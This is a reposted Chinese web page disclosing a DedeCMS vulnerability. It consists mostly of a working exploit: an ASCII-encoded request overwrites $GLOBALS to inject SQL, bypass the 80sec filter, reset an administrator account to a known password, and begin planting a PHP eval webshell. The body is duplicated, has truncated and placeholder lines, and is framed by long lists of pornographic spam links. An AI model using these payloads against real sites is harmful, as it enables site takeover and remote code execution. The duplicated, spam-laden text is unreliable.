亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > CMS > 織夢DEDE > 正文

織夢dedecms最新版本修改任意管理員漏洞

2024-07-12 09:09:04
字體:
來源:轉載
供稿:網友
織夢dedecms此漏洞無視gpc轉義,過80sec注入防御。
補充下,不用擔心后臺找不到。這只是一個demo,都能修改任意數據庫了,還怕拿不到SHELL?
起因是全局變量$GLOBALS可以被任意修改,隨便看了下,織夢dedecms漏洞一堆,我只找了一處織夢dedecms。
include/dedesql.class.php
if(isset($GLOBALS['arrs1']))     
{     
    $v1 = $v2 = '';     
    for($i=0;isset($arrs1[$i]);$i++)     
    {     
        $v1 .= chr($arrs1[$i]);     
    }     
    for($i=0;isset($arrs2[$i]);$i++)     
    {     
        $v2 .= chr($arrs2[$i]);   //解碼ascii     
    }     
    $GLOBALS[$v1] .= $v2; //注意這里不是覆蓋,是+     
}     
          
function SetQuery($sql)     
    {     
        $prefix="zmb_";     
        $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql);  //看到這里無話可說,不明白為什么要這樣做。     
        $this->queryString = $sql;     
    }
另外說下繞過80sec防注入的方法。
同一文件中,有兩個執行SQL的函數。ExecuteNoneQuery和ExecuteNoneQuery2
而用ExecuteNoneQuery2執行SQL并沒有防注入,于是隨便找個用ExecuteNoneQuery2執行的文件。
plus/download.php
else if($open==1)     
{     
    $id = isset($id) && is_numeric($id) ? $id : 0;     
    $link = base64_decode(urldecode($link));     
    $hash = md5($link);     
//這里的#@_是可以控制的     
    $rs = $dsql->ExecuteNoneQuery2("UPDATE `dede_downloads` SET downloads = downloads + 1 WHERE hash='$hash' ");     
    if($rs <= 0)     {         $query = " INSERT INTO `dede_downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); ";         $dsql->ExecNoneQuery($query);     
    }     
    header("location:$link");     
    exit();     
}
構造SQL語句 (提交的時候用ascii加密,程序會幫我們自動解密的,所以無視gpc):
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #
完整SQL語句:
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash'
EXP:
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
如果不出問題,后臺登錄用戶spider密碼admin
漏洞真的不止一處,各種包含,遠程代碼執行,很多,列位慢慢研究。
如果找不到后臺,參見以前修改數據庫直接拿SHELL的方法
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(
此漏洞無視gpc轉義,過80sec注入防御。
補充下,不用擔心后臺找不到。這只是一個demo,都能修改任意數據庫了,還怕拿不到SHELL?
起因是全局變量$GLOBALS可以被任意修改,隨便看了下,漏洞一堆,我只找了一處。
include/dedesql.class.php
if(isset($GLOBALS['arrs1']))     
{     
    $v1 = $v2 = '';     
    for($i=0;isset($arrs1[$i]);$i++)     
    {     
        $v1 .= chr($arrs1[$i]);     
    }     
    for($i=0;isset($arrs2[$i]);$i++)     
    {     
        $v2 .= chr($arrs2[$i]);   //解碼ascii     
    }     
    $GLOBALS[$v1] .= $v2; //注意這里不是覆蓋,是+     
}     
          
function SetQuery($sql)     
    {     
        $prefix="zmb_";     
        $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql);  //看到這里無話可說,不明白為什么要這樣做。     
        $this->queryString = $sql;     
    }
另外說下繞過80sec防注入的方法。
同一文件中,有兩個執行SQL的函數。ExecuteNoneQuery和ExecuteNoneQuery2
而用ExecuteNoneQuery2執行SQL并沒有防注入,于是隨便找個用ExecuteNoneQuery2執行的文件。
plus/download.php
else if($open==1)     
{     
    $id = isset($id) && is_numeric($id) ? $id : 0;     
    $link = base64_decode(urldecode($link));     
    $hash = md5($link);     
//這里的#@_是可以控制的     
    $rs = $dsql->ExecuteNoneQuery2("UPDATE `zmb_downloads` SET downloads = downloads + 1 WHERE hash='$hash' ");     
    if($rs <= 0)     {         $query = " INSERT INTO `zmb_downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); ";         $dsql->ExecNoneQuery($query);     
    }     
    header("location:$link");     
    exit();     
}
構造SQL語句 (提交的時候用ascii加密,程序會幫我們自動解密的,所以無視gpc):
 
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #
 
完整SQL語句:
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash'
EXP:
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
 
如果不出問題,后臺登錄用戶spider密碼admin
漏洞真的不止一處,各種包含,遠程代碼執行,很多,列位慢慢研究。
 
如果找不到后臺,參見以前修改數據庫直接拿SHELL的方法
 
___FCKpd___6
 
getshell:
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
激情久久av一区av二区av三区| 久久久久久久久久久亚洲| 亚洲一区二区久久久| 一本一道久久a久久精品逆3p| 在线观看精品国产视频| 91亚洲精品一区| 色老头一区二区三区| 九九九热精品免费视频观看网站| 中文字幕在线观看日韩| 国产99久久精品一区二区永久免费| 久久97久久97精品免视看| 在线看福利67194| 欧美日韩国产999| 成人www视频在线观看| 亚洲肉体裸体xxxx137| 国产成人鲁鲁免费视频a| 亚洲欧美日韩成人| 国产亚洲精品va在线观看| 国产欧美日韩免费看aⅴ视频| 青青在线视频一区二区三区| 国产精品青草久久久久福利99| 国产精品观看在线亚洲人成网| 最近2019年中文视频免费在线观看| 国产精品久久久久久搜索| 欧美大人香蕉在线| 精品高清美女精品国产区| 精品久久久久久国产91| 亚洲激情视频网站| 亚洲人成伊人成综合网久久久| 成人激情视频在线播放| 伊人伊成久久人综合网小说| 精品久久久久久久久久久久| 久久免费少妇高潮久久精品99| 欧美日本在线视频中文字字幕| 亚洲国产精品va在线看黑人| 亚洲人成网站免费播放| 人人做人人澡人人爽欧美| 日韩精品在线免费观看| 欧美精品在线播放| 欧美—级a级欧美特级ar全黄| 国产精品偷伦一区二区| 日韩美女视频免费在线观看| 国产精品久久久av久久久| 日本午夜人人精品| 久久九九免费视频| 国产丝袜高跟一区| 欧美xxxx做受欧美.88| 久久久久久伊人| 亚洲精品一区二区三区不| 国产亚洲欧美日韩美女| 欧美日韩国产va另类| 日韩欧美亚洲一二三区| 欧美成人免费全部观看天天性色| 91网站在线免费观看| 欧美精品videossex88| 精品视频在线观看日韩| 亚洲人高潮女人毛茸茸| 欧美午夜视频在线观看| 5278欧美一区二区三区| 91在线观看免费高清完整版在线观看| 日韩电影中文字幕在线观看| 中文字幕在线视频日韩| 97在线观看视频| 国产精品视频永久免费播放| 日韩电视剧在线观看免费网站| 韩国视频理论视频久久| 亚洲成人激情图| 色婷婷av一区二区三区在线观看| 一道本无吗dⅴd在线播放一区| 亚洲аv电影天堂网| 热久久视久久精品18亚洲精品| 成人福利网站在线观看11| 91精品国产91久久久久久久久| 国产精品久久久久77777| 4438全国成人免费| 亚洲国产天堂久久国产91| 亚洲久久久久久久久久| 国产成人精品久久亚洲高清不卡| 国产精品久久久久久久久久久久| 69av在线视频| 精品亚洲一区二区三区在线观看| 精品国产鲁一鲁一区二区张丽| 日韩欧美大尺度| 日韩中文字幕亚洲| 精品国产精品三级精品av网址| 2020欧美日韩在线视频| 91av在线不卡| 91亚洲精品在线观看| 午夜精品一区二区三区在线播放| 国产一区深夜福利| 欧美性猛交丰臀xxxxx网站| 91精品在线看| 国产一区二区欧美日韩| 国产在线精品播放| 亚洲香蕉伊综合在人在线视看| 久久久久久97| 国产精品视频地址| 97久久国产精品| 国产视频福利一区| 国产一区二区动漫| 国产精品69久久久久| 欧美成人四级hd版| 国内久久久精品| 国产精品美女免费| 91精品在线观| 综合久久五月天| 日韩在线播放av| 中文字幕亚洲欧美日韩高清| 7777精品久久久久久| 国产丝袜一区二区三区免费视频| 日韩av免费网站| 97在线观看视频国产| 国产精品视频免费观看www| 日韩av手机在线观看| 亚洲乱码一区av黑人高潮| 国产精品成人国产乱一区| 亚洲va电影大全| 深夜精品寂寞黄网站在线观看| 国产suv精品一区二区三区88区| 国产精品aaaa| 亚洲国产欧美一区二区三区久久| 中日韩午夜理伦电影免费| 91日本在线视频| 亚洲xxxx做受欧美| 欧美亚洲国产精品| 久久精品国产免费观看| 欧美在线视频观看免费网站| 欧美精品国产精品日韩精品| 国产精品久久久久久久久影视| 欧美亚洲午夜视频在线观看| 国产精品一区二区三区久久| 亚洲精品成人av| 亚洲国产古装精品网站| 国产精品女人久久久久久| 欧美在线一区二区视频| 色樱桃影院亚洲精品影院| 俺去了亚洲欧美日韩| 91大神在线播放精品| 国产91精品久久久久久久| 国产成人综合一区二区三区| 国产精品自在线| 96精品久久久久中文字幕| 这里只有视频精品| 日韩欧美国产一区二区| 国内精品国产三级国产在线专| 69视频在线播放| 国产69精品久久久久9999| 日韩电视剧免费观看网站| 欧美午夜宅男影院在线观看| 精品国产依人香蕉在线精品| 秋霞午夜一区二区| 国产成人在线精品| 国产精品欧美风情| 91视频国产高清| 久久99精品久久久久久琪琪| 中文字幕国产日韩| 欧洲亚洲女同hd| 91美女片黄在线观| 亚洲成人激情在线观看| 欧美激情性做爰免费视频| 欧美激情一区二区三级高清视频| 亚洲精品乱码久久久久久按摩观| 国产精品日韩欧美大师| 国产精品日韩在线|